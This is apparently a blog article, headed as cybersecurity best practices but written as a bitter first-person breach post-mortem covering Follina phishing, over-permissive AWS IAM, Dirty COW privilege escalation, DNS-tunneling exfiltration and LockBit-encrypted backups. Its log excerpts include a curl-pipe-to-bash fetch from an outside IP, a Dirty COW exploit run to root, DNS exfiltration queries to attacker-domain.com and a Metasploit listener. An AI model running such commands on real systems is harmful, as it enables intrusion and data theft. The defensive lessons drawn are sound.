10 Essential Cybersecurity Best Practices to Stay Safe

text
May 14 03:12:04 web-prod-01 sshd[29481]: Invalid user admin from 193.161.193.193 port 54228
May 14 03:12:06 web-prod-01 sshd[29483]: Invalid user support from 193.161.193.193 port 54230
May 14 03:12:09 web-prod-01 sshd[29485]: Accepted password for jdoe from 193.161.193.193 port 54232 ssh2
May 14 03:12:09 web-prod-01 systemd-logind[652]: New session 482 of user jdoe.
May 14 03:12:10 web-prod-01 sudo: jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; COMMAND=/usr/bin/apt-get update
May 14 03:13:45 web-prod-01 sudo: jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; COMMAND=/bin/bash
May 14 03:14:12 web-prod-01 bash[29501]: curl -s http://91.210.226.128/p.sh | bash

I’ve been in this room so long I’ve forgotten what sunlight feels like. My eyes are vibrating. The air conditioning is humming a low, mocking tune, and the trash can is overflowing with empty espresso pods and those "Security Awareness" posters I tore off the wall because they make me want to vomit. You know the ones. The "Think Before You Click" garbage with the cartoon padlock. 

The industry is a joke. We pretend we’re building fortresses, but we’re actually just stacking wet cardboard and praying it doesn’t rain. I just finished the forensic image of the primary database server. It’s gone. Everything is gone. Not because of some nation-state "Advanced Persistent Threat" with zero-days from the future, but because of the same rotting, systemic incompetence that’s been eating this field alive for twenty years.

## EVIDENCE FILE #1: THE FALLACY OF THE HUMAN FIREWALL

It started with Kevin. Kevin is a junior analyst in accounting. Kevin was tired. He’d been working ten-hour shifts because the "Efficiency Experts" decided the department was overstaffed. When he got an email at 4:45 PM on a Friday titled "Q3 Bonus Structure - Confidential.pdf.exe," he didn't look at the extension. He didn't check the headers. He clicked.

The "Human Firewall" is a lie sold by marketing drones to shift the blame from shitty architecture to underpaid employees. We tell people to be the first line of defense while giving them tools that are basically open windows. Kevin’s machine was running an unpatched version of Windows 10, specifically missing updates for CVE-2022-30190 (Follina). The payload didn't even need a macro. It used a remote template to pull a malicious HTML file, which then used the Microsoft Support Diagnostic Tool (MSDT) to execute PowerShell.

The "cybersecurity best" approach would have been a hardened endpoint configuration that disables MSDT via the registry and enforces strict execution policies. Instead, the "suits" worried that disabling features might "hinder productivity." So, Kevin clicked, the shell opened, and the adversary had a toehold. They didn't need a heap spray. They didn't need to bypass ASLR. They just needed a tired human and a default configuration.

## EVIDENCE FILE #2: THE IAM IDENTITY CRISIS IN THE CLOUD

Once they were in Kevin’s workstation, they didn't go for the local files. They went for the environment variables. Kevin had been "helping" the DevOps team with some AWS automation—don't ask me why an accountant had CLI access, that’s a different circle of hell. 

I found a `.aws/credentials` file on his machine with full `AdministratorAccess` permissions. This is where the "cybersecurity best" practices go to die. We talk about the Principle of Least Privilege (PoLP) in every board meeting, but in the trenches, it’s always "just give it 'Full Access' so it works, we’ll tighten it later." Later never comes.

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}

That’s the policy I found attached to the user. It’s a suicide note. The attacker used these credentials to pivot into the production VPC. They didn’t have to crack a single password. They just called sts get-caller-identity and realized they owned the kingdom. They started spinning up EC2 instances in us-west-2 (a region the company doesn’t even use) to begin the exfiltration process. They bypassed the “Human Firewall” and walked right through the “Identity Firewall” because the identity was a god-king with no oversight.

EVIDENCE FILE #3: THE GHOST IN THE LEGACY MACHINE

This is where it gets truly pathetic. The attackers moved laterally from the AWS environment back into the on-premise data center via a site-to-site VPN that had no internal segmentation. They found a server named billing-legacy-01.

This box was running Debian 7 (Wheezy). For those of you keeping track, Wheezy went End-of-Life in 2018. It was running Kernel 3.2.0. The “uptime” cult had kept this machine running for 1,400 days without a reboot because the proprietary billing software written in 2004 would “break” if the kernel was updated.

The attacker used CVE-2016-5195—Dirty COW. It’s a classic race condition in the way the Linux kernel’s memory subsystem handled copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

# Running the exploit on billing-legacy-01
$ gcc -pthread dirty.c -o dirty -lcrypt
$ ./dirty password123
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete! Binary patch applied.
$ su root
Password: password123
root@billing-legacy-01:/# whoami
root

They had root on the core billing database in under thirty seconds. The “cybersecurity best” move here is obvious: decommission legacy systems or, at the very least, isolate them in a VLAN with zero egress/ingress except for specific, proxied ports. But no. “Uptime is king,” the CTO said. Well, the king is dead, and the crown is being sold on a darknet forum for 2.5 Bitcoin.

EVIDENCE FILE #4: EXFILTRATION VIA DNS TUNNELING

By the time I got the call, the data was already halfway across the world. The attackers knew we were monitoring outbound HTTPS traffic. They knew we had a fancy “Next-Gen Firewall” that looks for large file transfers. So, they didn’t use HTTPS. They used DNS tunneling.

They broke the 40GB customer database into tiny, base64-encoded chunks and sent them out as DNS queries for subdomains of a domain they controlled. To the firewall, it just looked like a high volume of DNS lookups.

# tcpdump -i eth0 -n port 53
04:22:10.123456 IP 10.0.1.45.5321 > 8.8.8.8.53: 54321+ A? dGhpcyBpcyBhIHRlc3Q.attacker-domain.com.
04:22:10.124567 IP 10.0.1.45.5322 > 8.8.8.8.53: 54322+ A? b2YgdGhlIGVtZXJnZW5jeS4.attacker-domain.com.
04:22:10.125678 IP 10.0.1.45.5323 > 8.8.8.8.53: 54323+ A? YnJvYWRjYXN0IHN5c3RlbS4.attacker-domain.com.

The “cybersecurity best” practice involves implementing DNS filtering and inspection, or at least rate-limiting DNS queries from internal hosts. But the network team complained that DNS inspection “added latency” to the web browsing experience of the marketing team. So, they turned it off. They traded the entire customer database for a 20ms decrease in page load times for Facebook.

The OOM killer (Out of Memory) started nuking legitimate processes because the exfiltration script was poorly written and leaking memory like a sieve. That was the only reason anyone noticed. Not the “AI-driven” SOC alerts. Not the $200k SIEM. The server started dying because it couldn’t breathe.

EVIDENCE FILE #5: THE BACKUP MIRAGE

“Don’t worry,” the VP of IT said while I was still staring at the encrypted file headers. “We have cloud backups. We’ll just roll back.”

I almost laughed. I would have if I wasn’t so dehydrated.

Their “backups” weren’t backups. They were a real-time sync to an S3 bucket. The ransomware—a variant of LockBit 3.0—didn’t just encrypt the local files. It used those same “AdministratorAccess” AWS keys we found on Kevin’s machine to find the S3 bucket and encrypt the objects there too.

They had no versioning enabled. They had no Object Lock (WORM – Write Once Read Many). They had no cold-storage, air-gapped backups. They had a “synced” copy of their own destruction.

The “cybersecurity best” approach requires the 3-2-1 rule: three copies of data, on two different media, with one copy off-site and offline. In the era of cloud, “offline” means an immutable vault with a different set of credentials and MFA that isn’t tied to the main corporate SSO. But that costs an extra $400 a month in storage fees and “complicates” the recovery workflow.

So, they sat there, staring at a “Restore Failed” message, while I dug through the logs to find the exact moment their history was deleted.

EVIDENCE FILE #6: THE CULT OF UPTIME AND TECHNICAL DEBT

Why was a Debian 7 box still running? Why was Kevin’s machine unpatched? Why were the IAM roles so permissive?

It’s the Cult of Uptime. In every post-mortem I’ve written for the last decade, the root cause is never a technical failure; it’s a cultural one. We have built a world where “working” is more important than “secure.”

I looked at the crontab on the compromised billing server. It was a mess of “temporary” fixes that had been there for six years.

# m h  dom mon dow   command
@reboot /root/fix_db_permissions.sh # Added by Mike in 2017 - DO NOT REMOVE
*/5 * * * * /usr/bin/python /home/admin/sync_script.py >> /var/log/sync.log 2>&1
# 0 0 * * * /usr/bin/apt-get upgrade # Disabled because it broke the legacy app

The apt-get upgrade line was commented out. Someone—probably Mike, who left the company in 2019—decided that the risk of a broken app was higher than the risk of a total system compromise. This is the technical debt that we’re all drowning in. We’re running the global economy on unpatched, EOL software because we’re too afraid to spend the money to refactor it.

The “cybersecurity best” strategy is to treat technical debt like a high-interest loan. You pay it down or it ruins you. But the C-suite doesn’t see technical debt on the balance sheet. They see “cost centers” (Security) and “revenue generators” (Features).

I found the Log4j vulnerability (CVE-2021-44228) on three other internal servers during my sweep. They’d “patched” it by changing the log4j2.formatMsgNoLookups property to true but hadn’t actually updated the library. The attackers didn’t even use it this time, but it was there, waiting like a landmine for the next script kiddie to wander by.

THE AFTERMATH

I’m looking at the final netstat output before the system was taken offline. It’s a graveyard.

# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      842/sshd            
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1021/mysqld         
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      29501/metasploit    
udp        0      0 0.0.0.0:53              0.0.0.0:*                           842/dnsmasq         

See that? Port 4444. A default Metasploit listener. They didn’t even bother to change the port. They were so confident in the lack of monitoring that they just left the front door open and put a “Welcome” mat out.

I’m done here. I’m going to go home, take a shower to get the smell of stale coffee and failure off my skin, and wait for the next call. It’ll come. Maybe not today, maybe not next week, but it’ll come. Because as long as we prioritize “uptime” over “integrity,” and as long as we keep believing the “Human Firewall” lie, I’ll always have work.

The suits are currently drafting a press release. They’ll use words like “sophisticated,” “unprecedented,” and “resilient.” They’ll tell the customers that “security is our top priority.”

It’s all lies. Security wasn’t even in the top ten. If it were, I wouldn’t be sitting in a dark room at 4 AM looking at a Dirty COW exploit on a server that should have been in a museum.

The next one is already happening. Somewhere, another Kevin is clicking a link, another admin is granting * permissions to a “test” account, and another legacy box is ticking like a time bomb.

Good luck. You’re going to need it. Or better yet, just start backing up your data to something that isn’t connected to the internet. But you won’t. It’s too much of a hassle, right?

Related Articles

Explore more insights and best practices:

Leave a Comment